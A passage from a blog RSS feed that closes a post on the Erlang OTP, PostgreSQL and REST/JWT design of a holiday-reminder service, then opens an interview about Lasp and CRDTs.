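&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;start_link() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;init([]) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %% deliver a check message to this process every 15 minutes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    {ok, _TRef} = timer:send_interval(timer:minutes(15), check),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    {ok, #{}}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;handle_info(check, State) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %% db:due_reminders&#x2F;0 stands in for the actual database query;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    %% sending is delegated to isolated worker processes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [reminder_sup:send_reminder(R) || R &amp;lt;- db:due_reminders()],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    {noreply, State}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Any failure while sending an individual reminder happens in a separate process, so the checker keeps its schedule regardless.&lt;&#x2F;p&gt;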
&lt;p&gt;How often the checker runs and what information is passed to workers are things that changed as the model and its implementation got more sophisticated, but the general idea was to always isolate the decision to send a reminder from the act of sending it, so a failure in a specific channel wouldn’t affect other channels, other users, or the checker process.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;reminder-router&quot;&gt;Reminder router&lt;&#x2F;h4&gt;
&lt;p&gt;The reminders are sent by gen_server processes called reminder routers, which are children of a supervisor under a simple_one_for_one strategy. Different channel modules implement the specifics to send the message on each service (email, slack, webhook).&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-not-gen-event&quot;&gt;Why not gen_event?&lt;&#x2F;h4&gt;
&lt;p&gt;While first studying OTP behaviors, my coworkers suggested I defer reading about gen_event, since it wasn’t used much in practice. When I started to work on HolidayPing, though, which is almost entirely about setting up and triggering events, it sounded like gen_event would be something to consider. And indeed a superficial overview confirmed that; quoting the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang-in-anger.com&#x2F;&quot;&gt;Erlang in Anger book&lt;&#x2F;a&gt;: &lt;em&gt;a gen_event will act as an event hub for callbacks, or as a way to deal with notifications of some sort&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;So I went back to my coworkers: how come we aren’t using gen_event for this? It turns out that this behavior &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.afronski.pl&#x2F;2015&#x2F;11&#x2F;02&#x2F;what-is-wrong-with-gen-event.html&quot;&gt;doesn’t provide much of the benefits&lt;&#x2F;a&gt; one would expect for such an event hub. In terms of what was discussed at the beginning of this section, gen_event does not provide isolation between events, so a slow or crashing event would affect the rest.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-not-worker-pools&quot;&gt;Why not worker pools?&lt;&#x2F;h4&gt;
&lt;p&gt;At a certain point in the development, each router was sending the reminders for all the channels of a user on a given holiday. We wanted to further separate processing to have isolated channel requests (e.g. we didn’t want to skip email sending if there was a crash requesting Slack).&lt;&#x2F;p&gt;
&lt;p&gt;The obvious option was to add a second simple_one_for_one supervisor with a new gen_server, but we briefly considered a worker pool instead. In other language ecosystems, where threads are expensive, a pool is a usual option. In Erlang, though, the story is different: processes are cheap and there’s no reason upfront to force a limit on the number of processes being created (with some exceptions, such as maintaining a pool of connections to a database). And if you hit a point where there’s so much work to do that the number of concurrent processes becomes too expensive, you will most likely need something fancier than a pool to overcome it (i.e. the pool manager will become a bottleneck or the queue will grow faster than workers can process it).&lt;&#x2F;p&gt;
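&lt;p&gt;The resulting shape is easy to sketch (again with illustrative names, not the actual HolidayPing code): a simple_one_for_one supervisor whose children are started on demand, one per reminder, instead of a pre-sized pool:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-module(reminder_sup).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-behaviour(supervisor).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-export([start_link&#x2F;0, send_reminder&#x2F;1, init&#x2F;1]).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;start_link() -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    supervisor:start_link({local, ?MODULE}, ?MODULE, []).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% one cheap, isolated process per reminder; a crash in one&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% channel cannot take down the others or the checker&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;send_reminder(Reminder) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    supervisor:start_child(?MODULE, [Reminder]).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;init([]) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    {ok, {{simple_one_for_one, 5, 10},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          [{reminder_router, {reminder_router, start_link, []},&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            temporary, 5000, worker, [reminder_router]}]}}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The temporary restart strategy reflects that a failed reminder is handled by the next checker run rather than by restarting the worker.&lt;&#x2F;p&gt;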
&lt;p&gt;Admittedly, our situation is atypical in the sense that a potential overload wouldn’t come from requests constantly arriving, but from a burst of reminders that need to be sent when the checker runs (currently every 15 minutes). We could easily alleviate this load by spreading the reminders over the time we have between one checker run and the next. Then again, doing this upfront would be a useless optimization.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;avoiding-throttling-issues&quot;&gt;Avoiding throttling issues&lt;&#x2F;h4&gt;
&lt;p&gt;Which brings me to an issue that we didn’t notice until I was writing these lines, and that’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;holiday_ping&#x2F;issues&#x2F;34&quot;&gt;still open&lt;&#x2F;a&gt;. While we don’t have reasons to expect that our system won’t be able to handle sending all reminders at once, it’s likely that the third party services we hit will enforce throttling limits on us.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s say that hopefully a thousand developers from Argentina find our project useful, and all of them set up a Slack channel, with the default reminder settings. If that’s the case, on Christmas morning at about 9:00am the reminder checker will attempt to send a thousand requests to Slack, more or less at the same time. Slack will likely reject those requests (and their retries next time the checker runs).&lt;&#x2F;p&gt;
&lt;p&gt;One way to reduce the chance of this happening would be the same as mentioned in the previous section: spread the reminder sending across the available time between one run and the next. Of course, with enough users the limit could be hit anyway, and we’d have to resort to finer-grained queuing or throttling mechanisms.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;database&quot;&gt;Database&lt;&#x2F;h3&gt;
&lt;p&gt;The database pick was simple: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@jlouis666&#x2F;how-to-build-stable-systems-6fe9dcf32fc4&quot;&gt;&lt;em&gt;PostgreSQL is the default database&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For me, it had been years of either &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;facundoolano.wordpress.com&#x2F;2012&#x2F;03&#x2F;11&#x2F;django-db-optimization-for-pedestrians&#x2F;&quot;&gt;hiding the database behind an ORM&lt;&#x2F;a&gt; or using schema-less stores like MongoDB. Although the lazy developer inside of me grumbled a bit at having to define the schemas upfront, I eventually came to remember how amazingly flexible and powerful PostgreSQL can be, to the point where I found myself pushing stuff (e.g. time arithmetic) down to the database level because it was just easier to work with than the available Erlang libraries. We even &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;holiday_ping&#x2F;issues&#x2F;179&quot;&gt;want to explore&lt;&#x2F;a&gt; domain integrity constraints to implement the long-postponed input validations on the backend.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;handle-the-configuration-differences-between-channels&quot;&gt;Handle the configuration differences between channels&lt;&#x2F;h4&gt;
&lt;p&gt;Our model had a spot that was hard to fit in the database schema: the user creates channels that can be of different types (Slack, email, webhook), each with different configuration parameters. The email channel takes a list of email addresses, webhook takes a single URL, and Slack takes a hook URL, a list of channels and users, an emoji, etc.&lt;&#x2F;p&gt;
&lt;p&gt;We care about those differences only at each end of the application: when we validate the user input, and when we execute the type-specific logic to send a reminder; everywhere else, we want to treat the channels equally, regardless of their configuration. We tried several PostgreSQL features to store the channel configuration.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;inheritance&quot;&gt;Inheritance&lt;&#x2F;h4&gt;
&lt;p&gt;This use case seemed like a good fit for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.postgresql.org&#x2F;docs&#x2F;9.6&#x2F;static&#x2F;ddl-inherit.html&quot;&gt;table inheritance&lt;&#x2F;a&gt;: we wrote a base channel table with all the common fields (user, name, type) and separate tables inheriting from it adding the type-specific configuration. But we soon found out that inheritance features are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.postgresql.org&#x2F;docs&#x2F;9.6&#x2F;static&#x2F;ddl-inherit.html#DDL-INHERIT-CAVEATS&quot;&gt;very limited&lt;&#x2F;a&gt; and don’t provide the features that would justify the choice: unique constraints aren’t enforced across children, you can’t get children’s data when querying the parent, etc.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;plain-tables&quot;&gt;Plain tables&lt;&#x2F;h4&gt;
&lt;p&gt;Given that inheritance didn’t provide much operational value, using separate tables for configuration and managing them manually made more sense. This is the way to go in the long run, since we want to benefit from type validations and constraints; but compared with schemaless storage, it would have induced a lot of overhead in the early stages of development, considering that the channel types and the model in general were far from stable.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;hstore&quot;&gt;hstore&lt;&#x2F;h4&gt;
&lt;p&gt;We started looking at unstructured PostgreSQL data types. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.postgresql.org&#x2F;docs&#x2F;current&#x2F;static&#x2F;hstore.html&quot;&gt;hstore&lt;&#x2F;a&gt; is a key&#x2F;value type, but it doesn’t support arrays (i.e. more than one value per key). We needed this for channel options, so hstore didn’t do the trick.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;jsonb&quot;&gt;jsonb&lt;&#x2F;h4&gt;
&lt;p&gt;So we turned again to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.postgresql.org&#x2F;docs&#x2F;9.5&#x2F;static&#x2F;datatype-json.html&quot;&gt;JSON&lt;&#x2F;a&gt;. jsonb fields let us store arbitrary configuration inside the channel table, and treat it like an opaque value except on the spot where we actually use that configuration to send a reminder. Arguably this is the most convenient option only because we never got to the point of thoroughly validating channel input in the backend. When we get there, it will make sense to define properly structured tables first.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;rest-api-1&quot;&gt;Rest API&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;identifiers&quot;&gt;Identifiers&lt;&#x2F;h4&gt;
&lt;p&gt;We’ve spent some time discussing ways of identifying our resources across the project. This is a relevant discussion since it applies to most of our projects; we may as well settle on one design and be consistent from now on.&lt;&#x2F;p&gt;
&lt;p&gt;As we see it, the most flexible method is to use:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A serial ID, just for PostgreSQL. Every table has it, you use it for foreign keys and joins. You don’t want to expose it in the API, since it’s implementation dependent, and something that may not be reusable should you want to switch databases (or add an extra one).&lt;&#x2F;li&gt;
&lt;li&gt;A separate ID to uniquely identify the resource: a UUID that will never change and can be reused across databases.&lt;&#x2F;li&gt;
&lt;li&gt;When it makes sense, a “model” ID for the resource (a user email, a unique name, etc.). You may use it as an identifier in the user-facing API (i.e. in the REST URIs or the UI routes) to make it user friendly. But you shouldn’t rely on it for internal storage and correlation: even if you start out with an “email won’t change” assumption, business rules like that do change, and there’s no benefit in relying too heavily on them for your implementation.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The last one is something we didn’t get entirely right, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;holiday_ping&#x2F;issues&#x2F;113&quot;&gt;there’s still work to do&lt;&#x2F;a&gt;. Our current implementation has model IDs (user email, channel name, holiday date), but no external UUIDs, so some use cases like changing a channel name are not supported.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;authentication-and-authorization&quot;&gt;Authentication and authorization&lt;&#x2F;h4&gt;
&lt;p&gt;To manage authorization of the API, we went with Bearer tokens based on previous experience. What’s convenient about token authorization, as opposed to, say, requiring Basic Auth on every request, is that it allows us to decouple the authentication from the authorization: if we want to support a new authentication method (which we did when we added GitHub login), we just add a new auth endpoint that returns an access token; authorization on the rest of the API remains untouched.&lt;&#x2F;p&gt;
&lt;p&gt;Regarding the token format, I initially went with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;jwt.io&#x2F;&quot;&gt;JWT&lt;&#x2F;a&gt; without giving it much thought, because that’s what I’ve seen most commonly used to authorize web apps accessing a REST backend. My coworkers, who hadn’t heard of it before, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;holiday_ping&#x2F;issues&#x2F;20&quot;&gt;were suspicious&lt;&#x2F;a&gt;, which I understand, because it totally sounds like:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-LmkSEubDQc5xYFKb.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;And we’re &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@jlouis666&#x2F;two-technologies-which-are-bad-for-you-160311ad6b24#13fd&quot;&gt;not very fond of JSON&lt;&#x2F;a&gt;. So I dug in a little bit more to make sure the decision made sense. There are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;cryto.net&#x2F;~joepie91&#x2F;blog&#x2F;2016&#x2F;06&#x2F;13&#x2F;stop-using-jwt-for-sessions&#x2F;&quot;&gt;several&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;kev.inburke.com&#x2F;kevin&#x2F;things-to-use-instead-of-jwt&#x2F;&quot;&gt;articles&lt;&#x2F;a&gt; expressing concerns about using JWT, although most of them don’t apply to our use case. Assuming we want to stick to Bearer tokens, the alternative to JWT would be to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;auth0.com&#x2F;blog&#x2F;ten-things-you-should-know-about-tokens-and-cookies&#x2F;#token-oauth&quot;&gt;just store a random string in the database&lt;&#x2F;a&gt;, associated with the user, and check that value on every request. A quick comparison between the two options:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;JWT lets you identify the user without the need to hit the database on every request: the server decodes the token with the same secret it used to generate it, and checks the claims. To be fair, at least in our use case, there’s no evidence that going to the database on each request would be a problem.&lt;&#x2F;li&gt;
&lt;li&gt;JWT is stateless, which seems to be more in line with REST principles: there’s no session; the client sends the token on each request, which is enough to identify it.&lt;&#x2F;li&gt;
&lt;li&gt;Database stored tokens require a bit of extra effort: we need to manage expiration ourselves, delete old tokens and make sure we pick a secure enough method to generate them. On the other hand, blacklisting compromised tokens is easier than with JWT, since we can just flag them in the database (although this is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stackoverflow.com&#x2F;questions&#x2F;7030694&#x2F;why-do-access-tokens-expire&#x2F;7035926#7035926&quot;&gt;less of an issue&lt;&#x2F;a&gt; using a short expiration).&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
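&lt;p&gt;To make point 1 concrete, here’s a minimal sketch of the signed-token idea (illustrative Python only, not the actual HolidayPing code and not the full JWT spec: no header, no algorithm field, just an HMAC over the claims; the secret and names are made up):&lt;&#x2F;p&gt;

```python
# Toy self-contained token: the server can validate it with nothing but
# its secret, so no database lookup is needed on each request.
import base64
import hashlib
import hmac
import json
import time
from operator import lt

SECRET = b"server-side-secret"  # hypothetical key, never shipped to clients

def issue(user, ttl=3600):
    claims = {"sub": user, "exp": int(time.time()) + ttl}
    payload = base64.urlsafe_b64encode(json.dumps(claims).encode())
    sig = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return payload + b"." + base64.urlsafe_b64encode(sig)

def verify(token):
    payload, sig = token.split(b".")
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(base64.urlsafe_b64decode(sig), expected):
        return None  # tampered: signature no longer matches the claims
    claims = json.loads(base64.urlsafe_b64decode(payload))
    if lt(claims["exp"], time.time()):
        return None  # expired, no database involved at any point
    return claims["sub"]
```

&lt;p&gt;A database-stored token would replace the HMAC check with a lookup of the random string, plus the manual expiration handling mentioned in point 3.&lt;&#x2F;p&gt;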
&lt;p&gt;In conclusion, JWT is easier (although &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.infoq.com&#x2F;presentations&#x2F;Simple-Made-Easy&quot;&gt;it may not be simpler&lt;&#x2F;a&gt;) than database stored tokens. Either option can work, and I don’t see a strong enough reason to drop JWT having that already working.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;nested-resources&quot;&gt;Nested resources&lt;&#x2F;h4&gt;
&lt;p&gt;This is one of the things that we debated but didn’t reach a definite answer on. We have these RESTful resources:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&#x2F;api&#x2F;channels&#x2F;:name&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&#x2F;api&#x2F;channels&#x2F;:name&#x2F;holidays&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&#x2F;api&#x2F;channels&#x2F;:name&#x2F;reminders&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;And at some point the UI needs to display a summary view that lists channels including their holiday and reminder information.&lt;&#x2F;p&gt;
&lt;p&gt;What do we do? We obviously don’t want to force the UI to collect the data by making two extra requests per channel in the list. We don’t want to have an API tailor-made for this specific client, either. And don’t say GraphQL, because this is nowhere near big enough to call for that. We saw two acceptable solutions:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Use a generic query parameter like &lt;code&gt;?children=true&lt;&#x2F;code&gt; to indicate that all the children resources should be included in the response. The problem is that this is an all-or-nothing approach: with big enough resources, you may want some of the children and not all. I’ve seen APIs suffer from that, coming up with weird DSLs to recursively pick nested children in the responses (now, &lt;em&gt;that&lt;&#x2F;em&gt; is the case where you’d look at GraphQL nowadays).&lt;&#x2F;li&gt;
&lt;li&gt;Consider the detailed version of the channel (the one that includes its children information) as a separate resource altogether. At first this too felt a bit like forcing the backend to fit a client need (and, to be honest, looking at the URIs &#x2F;api&#x2F;channels and &#x2F;api&#x2F;channels_detail didn’t help); but after some thinking: better to let resources reproduce and keep the interface as dumb as possible (i.e. no magic query parameters).&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;We could have gone either way. We chose the separate resource because it was easier to implement.&lt;&#x2F;p&gt;
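&lt;p&gt;As a sketch of the option we picked (hypothetical Python, just to illustrate the shape of the responses; the helpers and data are made up), the detail resource simply composes the three plain resources server-side:&lt;&#x2F;p&gt;

```python
# Illustrative-only data access helpers; in the real app these would hit
# the database behind the channel resource and its children.
def get_channel(name):
    return {"name": name, "type": "slack"}

def get_holidays(name):
    return [{"date": "2017-12-25", "name": "Christmas"}]

def get_reminders(name):
    return [{"days_before": 1}]

def channel_detail(name):
    # the separate resource: one representation embedding the children
    detail = get_channel(name)
    detail["holidays"] = get_holidays(name)
    detail["reminders"] = get_reminders(name)
    return detail

def channels_detail(names):
    # what the summary view fetches in a single request
    return [channel_detail(n) for n in names]
```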
&lt;h3 id=&quot;tests&quot;&gt;Tests&lt;&#x2F;h3&gt;
&lt;p&gt;I think you can’t write serious software without some sort of testing. At some point it’s inefficient to try to make progress without tests to have your back. But I also think there are situations where being obligated to add tests is counterproductive. Apart from the one commandment: &lt;em&gt;thou shalt test thy shit&lt;&#x2F;em&gt;, I don’t like any kind of religiousness about testing. Some types of software benefit a lot from unit tests (testing specific functions, isolated from the rest of the system), some not so much; coverage can be a good indicator, but forcing a specific coverage level sucks; some people work better with TDD, some work better adding tests after having some working code; some stuff calls for testing every possible scenario, some for generative testing. Etcetera.&lt;&#x2F;p&gt;
&lt;p&gt;In my experience over the last few years, working on small APIs that mostly deal with connecting to and integrating with external services, there’s little benefit in pure unit tests. You have to spend a lot of time building mocks to test glue code, and even then the most common real-world scenarios can still fail. If your software deals mostly with integrations, then you need integration tests to have some sort of confidence that your project works and that you don’t break it when you modify it. And I do modify it a lot, all the time; that’s something I &lt;em&gt;am&lt;&#x2F;em&gt; religious about: if you aren’t breaking any APIs, you have the time and you know how to put your code in better shape, then you do it every time you can.&lt;&#x2F;p&gt;
&lt;p&gt;Fortunately my coworkers share the same vision, so for HolidayPing we focused on integration tests that make sure the project works as a whole, with a real database and sending actual reminders. At first with lots of shortcuts to make sure the internal parts were working, but eventually, as development moved forward and the API stabilized, we were able to rewrite the tests so they mostly talk to the external API.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;To be continued…&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lasp: a little further down the Erlang rabbithole</title>
          <pubDate>Tue, 09 May 2017 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lasp-a-little-further-down-the-erlang-rabbithole/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lasp-a-little-further-down-the-erlang-rabbithole/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lasp-a-little-further-down-the-erlang-rabbithole/">&lt;p&gt;A few years ago I found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lasp-lang.readme.io&#x2F;docs&quot;&gt;Lasp&lt;&#x2F;a&gt;: &lt;em&gt;“a suite of libraries aimed at providing a comprehensive programming system for planetary scale Elixir and Erlang applications”&lt;&#x2F;em&gt;. At this point it should come as no surprise for you to learn that here at Not a Monad Tutorial we are interested in distributed systems and Erlang. After playing a little bit with Lasp I watched a few talks by its creator: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;cmeik&quot;&gt;Christopher Meiklejohn&lt;&#x2F;a&gt;. After watching his talk &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=lsKaNDj4TrE&quot;&gt;“Distributed, Eventually Consistent Computations”&lt;&#x2F;a&gt; I decided it was time to interview Christopher.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Discuss and vote at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;3gvmyl&#x2F;lasp_little_further_down_erlang&quot;&gt;lobsters&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;6a620o&#x2F;lasp_a_little_further_down_the_erlang_rabbithole&#x2F;&quot;&gt;reddit&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=14300763&quot;&gt;hn&lt;&#x2F;a&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-SKlcy2D4QxhBrMdNYNCIHA.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is Lasp?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Originally, Lasp was a programming model designed for deterministic distributed computing with weak synchronization. Lasp’s programming model appears functional, in that you write applications that look like functional programs, but under arbitrary distribution, these applications are guaranteed to return the correct result, with minimal coordination, under network anomalies such as network partitions or node failures. Lasp achieves this by building upon the design philosophy of Conflict-free Replicated Data Types, or CRDTs: data structures that are designed to achieve convergence without requiring locking or other synchronization primitives.&lt;&#x2F;p&gt;
&lt;p&gt;During the evaluation phase of Lasp, we were tasked with trying to scale a prototype implementation written in Erlang to 10,000 nodes; we got as far as we could in the allotted time we had, which was 1,024 nodes running on Amazon EC2. In the process of trying to achieve that scale, we had to develop a number of libraries in Erlang to provide supporting infrastructure: new distribution algorithms, optimized implementations of the data types, deployment and operations tooling, etc. So, I’d say at this point Lasp, in the academic sense refers to the original programming model, but Lasp in the industrial sense, refers to the entire suite of libraries that deliver the programming system and programming model at large scale.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are CRDTs? What problems do CRDT solve?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;CRDTs, or Conflict-free Replicated Data Types, are data types that are designed for use in distributed systems: think regular sequential abstract data types, but with a predefined, deterministic merge function for any two possible values.&lt;&#x2F;p&gt;
&lt;p&gt;One of the big challenges in distributed computing is related to consistency. When a network partition occurs, any system that is managing replicated data must make a choice: do they allow operations to proceed, remaining available-under-partition, or do they prohibit operations from proceeding, remaining consistent-under-partition?&lt;br &#x2F;&gt;
Consistent-under-partition systems, or CP systems, provide strong consistency which makes application development easier, whereas available-under-partition systems, or AP systems, allow the developer to both exploit available concurrency in the system for performance, and keep servicing requests when network partitions inevitably occur. Available-under-partition systems are ideal for applications that are geo-distributed, because they allow users to read and write locally to their geographically close replica and don’t incur a synchronization penalty for write operations (which, in some cases can be &amp;gt; 100ms an operation).&lt;&#x2F;p&gt;
&lt;p&gt;However, one of the challenges in using available-under-partition systems is the potential for write conflicts: two writes happen to the same object concurrently at two replicas. When the network partition ultimately heals, the different replicas have to come to an agreement over which value wins. When using a database with opaque value registers that you &lt;code&gt;set&lt;&#x2F;code&gt; or &lt;code&gt;get&lt;&#x2F;code&gt; values on, this choice can be arbitrary: either choice may be valid, and systems like Cassandra resort to solving this by using the user provided timestamp to pick a value. Approaches like this, while deterministic, are problematic, however, because arbitrarily picking a value based on time and dropping the other write operation may fail to capture developer intent.&lt;&#x2F;p&gt;
